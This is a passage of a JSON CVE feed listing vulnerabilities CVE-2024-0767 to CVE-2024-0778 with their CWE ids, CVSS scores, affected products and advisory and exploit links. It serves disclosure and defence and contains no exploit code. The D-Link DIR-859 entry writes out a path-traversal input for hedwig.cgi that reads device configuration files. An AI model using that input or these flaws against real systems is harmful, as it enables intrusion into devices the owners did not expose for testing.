"2024-02-28T09:15Z", "lastModifiedDate" : "2025-01-08T18:43Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0767", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L332", "name" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L332", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L332", "name" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L332", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.4. This is due to missing or incorrect nonce validation on the ajax_plugin_activation function. This makes it possible for unauthenticated attackers to activate arbitrary installed plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:envothemes:envo\\'s_elementor_templates_\\&_widgets_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.4.5", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-28T09:15Z", "lastModifiedDate" : "2025-01-08T18:42Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0768", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L367", "name" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L367", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L367", "name" : "https://plugins.trac.wordpress.org/browser/envo-elementor-for-woocommerce/trunk/includes/admin/include/template-library.php#L367", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6504ae5c-a36d-495e-aa93-40a3753857c6?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 1.4.4. This is due to missing or incorrect nonce validation on the ajax_theme_activation function. This makes it possible for unauthenticated attackers to activate arbitrary installed themes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:envothemes:envo\\'s_elementor_templates_\\&_widgets_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.4.5", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-28T09:15Z", "lastModifiedDate" : "2025-01-08T18:42Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0769", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md", "name" : "https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371", "name" : "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251666", "name" : "https://vuldb.com/?ctiid.251666", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.251666", "name" : "https://vuldb.com/?id.251666", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://nvd.nist.gov/vuln/detail/CVE-2024-0769", "name" : "https://nvd.nist.gov/vuln/detail/CVE-2024-0769", "refsource" : "", "tags" : [ "US Government Resource" ] }, { "url" : "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371", "name" : "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251666", "name" : "https://vuldb.com/?ctiid.251666", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md", "name" : "https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251666", "name" : "https://vuldb.com/?id.251666", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dlink:dir-859_firmware:1.06:beta1:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dlink:dir-859:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-21T08:15Z", "lastModifiedDate" : "2025-06-26T19:29Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0770", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-276" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://imagebin.ca/v/7nx8zv3l62Kf", "name" : "https://imagebin.ca/v/7nx8zv3l62Kf", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://imagebin.ca/v/7nx8zv3l62Kf", "name" : "https://imagebin.ca/v/7nx8zv3l62Kf", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251670", "name" : "https://vuldb.com/?ctiid.251670", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251670", "name" : "https://vuldb.com/?ctiid.251670", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251670", "name" : "https://vuldb.com/?id.251670", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251670", "name" : "https://vuldb.com/?id.251670", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in European Chemicals Agency IUCLID 7.10.3 on Windows. Affected is an unknown function of the file iuclid6.exe of the component Desktop Installer. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. VDB-251670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:echa.europa:iuclid:7.10.3:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.2 } }, "publishedDate" : "2024-01-21T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0771", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.251671", "name" : "https://vuldb.com/?ctiid.251671", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251671", "name" : "https://vuldb.com/?ctiid.251671", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251671", "name" : "https://vuldb.com/?id.251671", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251671", "name" : "https://vuldb.com/?id.251671", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://youtu.be/eecN5mC0avU", "name" : "https://youtu.be/eecN5mC0avU", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://youtu.be/eecN5mC0avU", "name" : "https://youtu.be/eecN5mC0avU", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Nsasoft Product Key Explorer 4.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nsasoft:product_key_explorer:4.0.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-21T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0772", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.251672", "name" : "https://vuldb.com/?ctiid.251672", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251672", "name" : "https://vuldb.com/?ctiid.251672", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251672", "name" : "https://vuldb.com/?id.251672", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251672", "name" : "https://vuldb.com/?id.251672", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://youtu.be/WIeWeuXbkiY", "name" : "https://youtu.be/WIeWeuXbkiY", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://youtu.be/WIeWeuXbkiY", "name" : "https://youtu.be/WIeWeuXbkiY", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nsasoft:sharealarmpro:2.1.4:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-22T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0773", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/drive/folders/1YjJFvxis3gLWX95990Y-nJMbWCQHB02U?usp=sharing", "name" : "https://drive.google.com/drive/folders/1YjJFvxis3gLWX95990Y-nJMbWCQHB02U?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/drive/folders/1YjJFvxis3gLWX95990Y-nJMbWCQHB02U?usp=sharing", "name" : "https://drive.google.com/drive/folders/1YjJFvxis3gLWX95990Y-nJMbWCQHB02U?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251677", "name" : "https://vuldb.com/?ctiid.251677", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251677", "name" : "https://vuldb.com/?ctiid.251677", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251677", "name" : "https://vuldb.com/?id.251677", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251677", "name" : "https://vuldb.com/?id.251677", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in CodeAstro Internet Banking System 1.0. Affected by this vulnerability is an unknown functionality of the file pages_client_signup.php. The manipulation of the argument Client Full Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251677 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:martinmbithi:internet_banking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-22T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0774", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.251674", "name" : "https://vuldb.com/?ctiid.251674", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251674", "name" : "https://vuldb.com/?ctiid.251674", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251674", "name" : "https://vuldb.com/?id.251674", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251674", "name" : "https://vuldb.com/?id.251674", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://youtu.be/f_4eHkISrZg", "name" : "https://youtu.be/f_4eHkISrZg", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://youtu.be/f_4eHkISrZg", "name" : "https://youtu.be/f_4eHkISrZg", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Any-Capture Any Sound Recorder 2.93. It has been declared as problematic. This vulnerability affects unknown code of the component Registration Handler. The manipulation of the argument User Name/Key Code leads to memory corruption. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-251674 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:taurisoft:any_sound_recorder:2.93:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-22T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0775", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-0775", "name" : "https://access.redhat.com/security/cve/CVE-2024-0775", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0775", "name" : "https://access.redhat.com/security/cve/CVE-2024-0775", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2259414", "name" : "RHBZ#2259414", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2259414", "name" : "RHBZ#2259414", "refsource" : "", "tags" : [ "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://scm.linefinity.com/common/linux-stable/commit/4c0b4818b1f636bc96359f7817a2d8bab6370162", "name" : "https://scm.linefinity.com/common/linux-stable/commit/4c0b4818b1f636bc96359f7817a2d8bab6370162", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://scm.linefinity.com/common/linux-stable/commit/4c0b4818b1f636bc96359f7817a2d8bab6370162", "name" : "https://scm.linefinity.com/common/linux-stable/commit/4c0b4818b1f636bc96359f7817a2d8bab6370162", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionEndExcluding" : "6.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.2 } }, "publishedDate" : "2024-01-22T13:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0776", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/sweatxi/BugHub/blob/main/Pbcms%20Background%20recovery%20store%20xss.pdf", "name" : "https://github.com/sweatxi/BugHub/blob/main/Pbcms%20Background%20recovery%20store%20xss.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/sweatxi/BugHub/blob/main/Pbcms%20Background%20recovery%20store%20xss.pdf", "name" : "https://github.com/sweatxi/BugHub/blob/main/Pbcms%20Background%20recovery%20store%20xss.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251678", "name" : "https://vuldb.com/?ctiid.251678", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251678", "name" : "https://vuldb.com/?ctiid.251678", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251678", "name" : "https://vuldb.com/?id.251678", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251678", "name" : "https://vuldb.com/?id.251678", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, has been found in LinZhaoguan pb-cms 2.0. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation with the input
leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251678 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pb-cms_project:pb-cms:2.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-22T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0778", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/dezhoutorizhao/cve/blob/main/rce.md", "name" : "https://github.com/dezhoutorizhao/cve/blob/main/rce.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/dezhoutorizhao/cve/blob/main/rce.md", "name" : "https://github.com/dezhoutorizhao/cve/blob/main/rce.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251696", "name" : "https://vuldb.com/?ctiid.251696", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251696", "name" : "https://vuldb.com/?ctiid.251696", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251696", "name" : "https://vuldb.com/?id.251696", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251696", "name" : "https://vuldb.com/?id.251696", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:uniview:isc_2500-s_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "20210930", "cpe_name" : [ ] 